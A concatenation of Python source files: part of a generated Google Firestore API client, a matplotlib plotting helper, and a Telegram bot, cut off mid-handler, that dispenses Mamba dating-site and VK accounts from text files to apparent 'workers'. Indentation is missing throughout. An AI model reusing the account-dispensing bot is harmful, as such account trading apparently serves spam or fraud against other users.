ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}:listCollectionIds',
request_field='listCollectionIdsRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsListCollectionIdsRequest',
response_type_name='ListCollectionIdsResponse',
supports_download=False,
)
def Listen(self, request, global_params=None):
r"""Listens to changes.
Args:
request: (FirestoreProjectsDatabasesDocumentsListenRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListenResponse) The response message.
"""
config = self.GetMethodConfig('Listen')
return self._RunMethod(
config, request, global_params=global_params)
Listen.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:listen',
http_method='POST',
method_id='firestore.projects.databases.documents.listen',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:listen',
request_field='listenRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsListenRequest',
response_type_name='ListenResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
r"""Updates or inserts a document.
Args:
request: (FirestoreProjectsDatabasesDocumentsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Document) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}',
http_method='PATCH',
method_id='firestore.projects.databases.documents.patch',
ordered_params=['name'],
path_params=['name'],
query_params=['currentDocument_exists', 'currentDocument_updateTime', 'mask_fieldPaths', 'updateMask_fieldPaths'],
relative_path='v1/{+name}',
request_field='document',
request_type_name='FirestoreProjectsDatabasesDocumentsPatchRequest',
response_type_name='Document',
supports_download=False,
)
def Rollback(self, request, global_params=None):
r"""Rolls back a transaction.
Args:
request: (FirestoreProjectsDatabasesDocumentsRollbackRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Rollback')
return self._RunMethod(
config, request, global_params=global_params)
Rollback.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:rollback',
http_method='POST',
method_id='firestore.projects.databases.documents.rollback',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:rollback',
request_field='rollbackRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsRollbackRequest',
response_type_name='Empty',
supports_download=False,
)
def RunQuery(self, request, global_params=None):
r"""Runs a query.
Args:
request: (FirestoreProjectsDatabasesDocumentsRunQueryRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RunQueryResponse) The response message.
"""
config = self.GetMethodConfig('RunQuery')
return self._RunMethod(
config, request, global_params=global_params)
RunQuery.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}:runQuery',
http_method='POST',
method_id='firestore.projects.databases.documents.runQuery',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}:runQuery',
request_field='runQueryRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsRunQueryRequest',
response_type_name='RunQueryResponse',
supports_download=False,
)
def Write(self, request, global_params=None):
r"""Streams batches of document updates and deletes, in order.
Args:
request: (FirestoreProjectsDatabasesDocumentsWriteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(WriteResponse) The response message.
"""
config = self.GetMethodConfig('Write')
return self._RunMethod(
config, request, global_params=global_params)
Write.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:write',
http_method='POST',
method_id='firestore.projects.databases.documents.write',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:write',
request_field='writeRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsWriteRequest',
response_type_name='WriteResponse',
supports_download=False,
)
class ProjectsDatabasesOperationsService(base_api.BaseApiService):
"""Service class for the projects_databases_operations resource."""
_NAME = 'projects_databases_operations'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesOperationsService, self).__init__(client)
self._upload_configs = {
}
def Cancel(self, request, global_params=None):
r"""Starts asynchronous cancellation on a long-running operation. The server.
makes a best effort to cancel the operation, but success is not
guaranteed. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`. Clients can use
Operations.GetOperation or
other methods to check whether the cancellation succeeded or whether the
operation completed despite cancellation. On successful cancellation,
the operation is not deleted; instead, it becomes an operation with
an Operation.error value with a google.rpc.Status.code of 1,
corresponding to `Code.CANCELLED`.
Args:
request: (FirestoreProjectsDatabasesOperationsCancelRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Cancel')
return self._RunMethod(
config, request, global_params=global_params)
Cancel.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/operations/{operationsId}:cancel',
http_method='POST',
method_id='firestore.projects.databases.operations.cancel',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:cancel',
request_field='googleLongrunningCancelOperationRequest',
request_type_name='FirestoreProjectsDatabasesOperationsCancelRequest',
response_type_name='Empty',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes a long-running operation. This method indicates that the client is.
no longer interested in the operation result. It does not cancel the
operation. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request: (FirestoreProjectsDatabasesOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/operations/{operationsId}',
http_method='DELETE',
method_id='firestore.projects.databases.operations.delete',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesOperationsDeleteRequest',
response_type_name='Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Gets the latest state of a long-running operation. Clients can use this.
method to poll the operation result at intervals as recommended by the API
service.
Args:
request: (FirestoreProjectsDatabasesOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/operations/{operationsId}',
http_method='GET',
method_id='firestore.projects.databases.operations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesOperationsGetRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists operations that match the specified filter in the request. If the.
server doesn't support this method, it returns `UNIMPLEMENTED`.
NOTE: the `name` binding allows API services to override the binding
to use different resource name schemes, such as `users/*/operations`. To
override the binding, API services can add a binding such as
`"/v1/{name=users/*}/operations"` to their service configuration.
For backwards compatibility, the default name includes the operations
collection id, however overriding users must ensure the name binding
is the parent resource, without the operations collection id.
Args:
request: (FirestoreProjectsDatabasesOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningListOperationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/operations',
http_method='GET',
method_id='firestore.projects.databases.operations.list',
ordered_params=['name'],
path_params=['name'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1/{+name}/operations',
request_field='',
request_type_name='FirestoreProjectsDatabasesOperationsListRequest',
response_type_name='GoogleLongrunningListOperationsResponse',
supports_download=False,
)
class ProjectsDatabasesService(base_api.BaseApiService):
"""Service class for the projects_databases resource."""
_NAME = 'projects_databases'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesService, self).__init__(client)
self._upload_configs = {
}
def ExportDocuments(self, request, global_params=None):
r"""Exports a copy of all or a subset of documents from Google Cloud Firestore.
to another storage system, such as Google Cloud Storage. Recent updates to
documents may not be reflected in the export. The export occurs in the
background and its progress can be monitored and managed via the
Operation resource that is created. The output of an export may only be
used once the associated operation is done. If an export operation is
cancelled before completion it may leave partial data behind in Google
Cloud Storage.
Args:
request: (FirestoreProjectsDatabasesExportDocumentsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('ExportDocuments')
return self._RunMethod(
config, request, global_params=global_params)
ExportDocuments.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}:exportDocuments',
http_method='POST',
method_id='firestore.projects.databases.exportDocuments',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:exportDocuments',
request_field='googleFirestoreAdminV1ExportDocumentsRequest',
request_type_name='FirestoreProjectsDatabasesExportDocumentsRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def ImportDocuments(self, request, global_params=None):
r"""Imports documents into Google Cloud Firestore. Existing documents with the.
same name are overwritten. The import occurs in the background and its
progress can be monitored and managed via the Operation resource that is
created. If an ImportDocuments operation is cancelled, it is possible
that a subset of the data has already been imported to Cloud Firestore.
Args:
request: (FirestoreProjectsDatabasesImportDocumentsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('ImportDocuments')
return self._RunMethod(
config, request, global_params=global_params)
ImportDocuments.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}:importDocuments',
http_method='POST',
method_id='firestore.projects.databases.importDocuments',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:importDocuments',
request_field='googleFirestoreAdminV1ImportDocumentsRequest',
request_type_name='FirestoreProjectsDatabasesImportDocumentsRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
class ProjectsLocationsService(base_api.BaseApiService):
"""Service class for the projects_locations resource."""
_NAME = 'projects_locations'
def __init__(self, client):
super(FirestoreV1.ProjectsLocationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets information about a location.
Args:
request: (FirestoreProjectsLocationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Location) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/locations/{locationsId}',
http_method='GET',
method_id='firestore.projects.locations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsLocationsGetRequest',
response_type_name='Location',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists information about the supported locations for this service.
Args:
request: (FirestoreProjectsLocationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListLocationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/locations',
http_method='GET',
method_id='firestore.projects.locations.list',
ordered_params=['name'],
path_params=['name'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1/{+name}/locations',
request_field='',
request_type_name='FirestoreProjectsLocationsListRequest',
response_type_name='ListLocationsResponse',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = 'projects'
def __init__(self, client):
super(FirestoreV1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
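# A hypothetical usage sketch (not part of the generated file): fetching a
# single document with this client. The resource name below is a placeholder
# and real Google credentials are required.
def _example_get_document():
  client = FirestoreV1()
  request = messages.FirestoreProjectsDatabasesDocumentsGetRequest(
      name='projects/my-project/databases/(default)/documents/users/alice')
  return client.projects_databases_documents.Get(request)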
# ---- source: wizacass/Intelektika_Proj :: /graph.py (no license) ----
import matplotlib.pyplot as plt
import numpy as np
import math
from collections import Counter
class Grapher:
def __init__(self, dataset: str):
self.dataset = dataset
def histo(self, attribute, binary=False):
if binary:
counter = Counter(attribute.values)
plt.bar(counter.keys(), counter.values())
else:
counts, bins = np.histogram(attribute.values)
plt.hist(bins[:-1], bins, weights=counts)
plt.xlabel(attribute.name)
plt.ylabel("Count")
plt.savefig(f"results/graphs/{self.dataset}/{attribute.name}.png")
plt.clf()
def scatter(self, attributeX, attributeY):
plt.xlabel(attributeX.name)
plt.ylabel(attributeY.name)
plt.scatter(attributeX.values, attributeY.values, alpha=0.5)
plt.savefig(
f"results/graphs/{self.dataset}/{attributeX.name} on {attributeY.name}.png")
plt.clf()
def splom(self, attributes):
count = len(attributes)
r = range(0, count)
for i in r:
for j in r:
ax = plt.subplot2grid((count, count), (i, j))
ax.set_axis_off()
if i != j:
ax.scatter(
attributes[i].values,
attributes[j].values,
s=0.5, alpha=0.25
)
plt.savefig(
f"results/graphs/{self.dataset}/splom.png",
dpi=1200
)
plt.clf()
def bar_plot(self, attribute, label=""):
counter = Counter(attribute.values)
plt.bar(counter.keys(), counter.values())
plt.xlabel(attribute.name)
plt.ylabel("Count")
plt.savefig(
f"results/graphs/{self.dataset}/bar_{attribute.name} {label}.png")
plt.clf()
def box_plot(self, attributes: list, labelX: str, labelY: str):
plt.boxplot(attributes)
plt.xticks([1, 2], ["True", "False"])
plt.xlabel(labelX)
plt.ylabel(labelY)
plt.savefig(
f"results/graphs/{self.dataset}/box_{labelX} on {labelY}.png")
plt.clf()
def correlation_matrix(self, correlation_data: list, labels: list):
plt.matshow(correlation_data)
plt.colorbar()
plt.xticks(range(0, len(correlation_data[0])), labels, rotation=45)
plt.yticks(range(0, len(correlation_data[1])), labels, rotation=45)
plt.savefig(
f"results/graphs/{self.dataset}/correlation_matrix.png")
plt.clf()
    def __column_count(self, size):
        # Sturges' rule for histogram bin count: k = 1 + 3.322 * log10(n).
        # The original expression, 1 + 3.22 * (math.log(math.e) ** size),
        # always evaluated to 4.22 because log(e) == 1.
        count = 1 + 3.322 * math.log10(size)
        return int(round(count))
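if __name__ == "__main__":
    # Hypothetical usage sketch (not part of the original module). It assumes
    # a pandas DataFrame whose columns expose .name and .values, and that the
    # results/graphs/<dataset>/ output directories already exist.
    import pandas as pd
    df = pd.read_csv("data.csv")  # placeholder input file
    grapher = Grapher("example")
    grapher.histo(df["age"])
    grapher.scatter(df["age"], df["income"])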
# ---- source: vadiz/TESTBOT :: /main test2 (no license) ----
#coding:utf-8
import telebot, config
from telebot import types
import datetime
from datetime import date
import time
import os
import sys
import subprocess
import string
import re
import random
from collections import Counter
knownUsers = [] # todo: save these in a file,
userStep = {} # so they won't reset every time the bot restarts
def get_user_step(uid):
if uid in userStep:
return userStep[uid]
else:
knownUsers.append(uid)
userStep[uid] = 0
return 0
def listener(messages):
for m in messages:
if m.content_type == 'text':
date = datetime.date.today()
print (str(m.chat.first_name) + " [" + str(m.chat.id) + "]: " + m.text)
vremya = time.asctime(time.localtime(time.time()))
print (vremya)
spisok = [str(vremya) + '-' + str(m.chat.first_name) + " [" + str(m.chat.id) + "]: " + m.text]
filename = str(date) + "_" + m.chat.first_name +'.txt'
spisok2 = open("/home/makar/rabotayet/Bot_working/logs/" + filename, 'a')
for index in spisok:
spisok2.write(index + '\n')
            spisok2.close()  # was 'spisok2.close' (missing call parentheses), which never closed the file
bot=telebot.TeleBot(config.TOKEN)
bot.set_update_listener(listener)
def main():
@bot.message_handler(commands=["start"])
def handle_text(message):
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
        priv = ('Hi;)', "Let's get to work, shall we?:P", 'Want some accounts?)', 'Mamba, VK!! Quick and easy!!!', "Press the butt... no wait, don't press... oh, just press it, I'm fine with it... Maybe...", "Let's push some buttons and break me))", 'I love it when my buttons get pushed))', 'Fed up? Ask for a picture!!')
#orig_mamba = open('mambaorig.txt', 'r+')
rab_mamba = open('mamba.txt', 'r+')
mamba_list = (rab_mamba.read())
mambalist = mamba_list.split('\n')
mambishche = [x for x in mambalist if x != '']
mambaresultat = str(len(mambishche))
print(mambaresultat)
#omambalist = (orig_mamba.read())
#omamba_list = omambalist.split('\n')
#result = []
#for index in mambishche:
# if index in omamba_list:
# result.append(index)
#print(len(result))
#mambaresultat = str(len(result))
#############
#orig_vk = open('vkorig.txt', 'r+')
rab_vk = open('vk.txt', 'r+')
vk_list = (rab_vk.read())
vklist = vk_list.split('\n')
vk_proverka = [x for x in vklist if x != '']
vkresultat = str(len(vk_proverka))
print(vkresultat)
#ovk_list = (orig_vk.read())
#ovklist = ovk_list.split('\n')
#vkresult = []
#for index in vk_proverka:
# if index in ovklist:
# vkresult.append(index)
#print(vkresult)
#print(len(vkresult))
#vkresultat = str(len(vkresult))
############
#orig_mamba_ua = open('mambaorigua.txt', 'r+')
rab_mamba_ua = open('mambaua.txt', 'r+')
mamba_list_ua = (rab_mamba_ua.read())
mambalist_ua = mamba_list_ua.split('\n')
mambishche_ua = [x for x in mambalist_ua if x != '']
mambauaresult = str(len(mambishche_ua))
print(mambauaresult)
#omambalist_ua = (orig_mamba_ua.read())
#omamba_list_ua = omambalist_ua.split('\n')
#mamba_ua_result = []
#for index in mambishche_ua:
# if index in omamba_list_ua:
# mamba_ua_result.append(index)
#print(len(mamba_ua_result))
#mambauaresult = str(len(mamba_ua_result))
#############
#orig_vkua = open('vkorigua.txt', 'r+')
rab_vkua = open('vkkiev.txt', 'r+')
vk_list_ua = (rab_vkua.read())
vklist_ua = vk_list_ua.split('\n')
vk_proverka_ua = [x for x in vklist_ua if x != '']
vkuaresultat = str(len(vk_proverka_ua))
print(vkuaresultat)
#ovk_list_ua = (orig_vkua.read())
#ovklist_ua = ovk_list_ua.split('\n')
#vkresult_ua = []
#for index in vk_proverka_ua:
# if index in ovklist_ua:
# vkresult_ua.append(index)
#print(len(vkresult_ua))
#vkuaresultat = str(len(vkresult_ua))
        user_markup.row('Need a Mamba for Kiev')
        user_markup.row('Get a VK Kiev')
        user_markup.row('Get a Mamba MSK')
        user_markup.row('Get a VK MSK')
        user_markup.row('BUTTON')
        bot.send_message(message.from_user.id, random.choice(priv), reply_markup=user_markup)
        bot.send_message(message.chat.id, 'I have plenty of goodies in stock:)\n')
        bot.send_message(message.chat.id, 'Mamba.ru: ' + mambaresultat + '\nVk.com: ' + vkresultat + '\nMamba.UA: ' + mambauaresult + '\nvk.com(ua): ' + vkuaresultat)
    @bot.message_handler(func=lambda message: message.text == "BUTTON")
def handle_text(message):
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
        user_markup.row('Back to main')
        bot.send_message(message.from_user.id, 'Come to me, sweetie...')
kartink = random.choice(os.listdir("/home/makar/rabotayet/Bot_working/kartinki/"))
kartinka = "/home/makar/rabotayet/Bot_working/kartinki/" + kartink
print (kartink)
print (kartinka)
bot.send_photo(message.from_user.id, open(kartinka, 'rb'))
@bot.message_handler(commands=["help"])
def start(message):
        bot.send_message(message.chat.id, 'Help text is not set yet.')  # the original sent an empty string, which the Telegram API rejects
    @bot.message_handler(func=lambda message: message.text == "Back to main")
def handle_text(message):
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
#orig_mamba = open('mambaorig.txt', 'r+')
rab_mamba = open('mamba.txt', 'r+')
mamba_list = (rab_mamba.read())
mambalist = mamba_list.split('\n')
mambishche = [x for x in mambalist if x != '']
mambaresultat = str(len(mambishche))
print(mambaresultat)
#omambalist = (orig_mamba.read())
#omamba_list = omambalist.split('\n')
#result = []
#for index in mambishche:
# if index in omamba_list:
# result.append(index)
#print(len(result))
#mambaresultat = str(len(result))
#############
#orig_vk = open('vkorig.txt', 'r+')
rab_vk = open('vk.txt', 'r+')
vk_list = (rab_vk.read())
vklist = vk_list.split('\n')
vk_proverka = [x for x in vklist if x != '']
vkresultat = str(len(vk_proverka))
print(vkresultat)
#ovk_list = (orig_vk.read())
#ovklist = ovk_list.split('\n')
#vkresult = []
#for index in vk_proverka:
# if index in ovklist:
# vkresult.append(index)
#print(vkresult)
#print(len(vkresult))
#vkresultat = str(len(vkresult))
############
#orig_mamba_ua = open('mambaorigua.txt', 'r+')
rab_mamba_ua = open('mambaua.txt', 'r+')
mamba_list_ua = (rab_mamba_ua.read())
mambalist_ua = mamba_list_ua.split('\n')
mambishche_ua = [x for x in mambalist_ua if x != '']
mambauaresult = str(len(mambishche_ua))
print(mambauaresult)
#omambalist_ua = (orig_mamba_ua.read())
#omamba_list_ua = omambalist_ua.split('\n')
#mamba_ua_result = []
#for index in mambishche_ua:
# if index in omamba_list_ua:
# mamba_ua_result.append(index)
#print(len(mamba_ua_result))
#mambauaresult = str(len(mamba_ua_result))
#############
#orig_vkua = open('vkorigua.txt', 'r+')
rab_vkua = open('vkkiev.txt', 'r+')
vk_list_ua = (rab_vkua.read())
vklist_ua = vk_list_ua.split('\n')
vk_proverka_ua = [x for x in vklist_ua if x != '']
vkuaresultat = str(len(vk_proverka_ua))
print(vkuaresultat)
#ovk_list_ua = (orig_vkua.read())
#ovklist_ua = ovk_list_ua.split('\n')
#vkresult_ua = []
#for index in vk_proverka_ua:
# if index in ovklist_ua:
# vkresult_ua.append(index)
#print(len(vkresult_ua))
#vkuaresultat = str(len(vkresult_ua))
        user_markup.row('Need a Mamba for Kiev')
        user_markup.row('Get a VK Kiev')
        user_markup.row('Get a Mamba MSK')
        user_markup.row('Get a VK MSK')
        user_markup.row('BUTTON')
        glavn = ('Here we are again, shall we continue)', 'Anything else?', 'Moving on.', 'Well, what else?', "I've been cleaned out...", 'I lost a piece of myself again:(', 'Would you like anything else?')
        bot.send_message(message.from_user.id, random.choice(glavn), reply_markup=user_markup)
        bot.send_message(message.chat.id, 'Now I have: \n' + 'Mamba.ru: ' + mambaresultat + '\nVk.com: ' + vkresultat + '\nMamba.UA: ' + mambauaresult + '\nvk.com(ua): ' + vkuaresultat, reply_markup=user_markup)
    @bot.message_handler(func=lambda message: message.text == "Need a Mamba for Kiev")
def handle_text(message):
#orig_mamba_ua = open('mambaorigua.txt', 'r+')
rab_mamba_ua = open('mambaua.txt', 'r+')
mamba_list_ua = (rab_mamba_ua.read())
mambalist_ua = mamba_list_ua.split('\n')
mambishche_ua = [x for x in mambalist_ua if x != '']
mambauaresult = str(len(mambishche_ua))
print(mambauaresult)
#omambalist_ua = (orig_mamba_ua.read())
#omamba_list_ua = omambalist_ua.split('\n')
#mamba_ua_result = []
#for index in mambishche_ua:
# if index in omamba_list_ua:
# mamba_ua_result.append(index)
#print(len(mamba_ua_result))
#mambauaresult = str(len(mamba_ua_result))
if mambauaresult == '1' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
            user_markup.row('One Mamba')
            user_markup.row('Back to main')
            bot.send_message(message.chat.id, "How many do you need? \nRemaining: " + mambauaresult, reply_markup=user_markup)
            @bot.message_handler(func=lambda message: message.text == "One Mamba")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
                mambaua = uaaccount.pop (0)
                del uaaccount[0]  # the account files apparently keep a blank line after each entry; drop it too
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
                user_markup.row('Back to main')
                bot.send_message(m.chat.id, 'Here you go: \n '+mambaua, reply_markup=user_markup)
                bot.send_message(m.chat.id, 'Work well and you will always have fresh, good-looking accounts;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
                uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
elif mambauaresult == '2' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
            user_markup.row('One Mamba')
            user_markup.row('Two Mambas')
            user_markup.row('Back to main')
            bot.send_message(message.chat.id, "How many do you need? \nRemaining: " + mambauaresult, reply_markup=user_markup)
            @bot.message_handler(func=lambda message: message.text == "One Mamba")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Две мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua)
bot.send_message(m.chat.id, mambaua1, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
elif mambauaresult == '3' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одна мамба')
user_markup.row('Две мамбы')
user_markup.row('Три мамбы')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько нужно? \nОстаток: " + mambauaresult, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одна мамба")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Две мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua)
bot.send_message(m.chat.id, mambaua1, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Три мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
elif mambauaresult == '4' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одна мамба')
user_markup.row('Две мамбы')
user_markup.row('Три мамбы')
user_markup.row('Четыре мамбы')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько нужно? \nОстаток: " + mambauaresult, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одна мамба")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
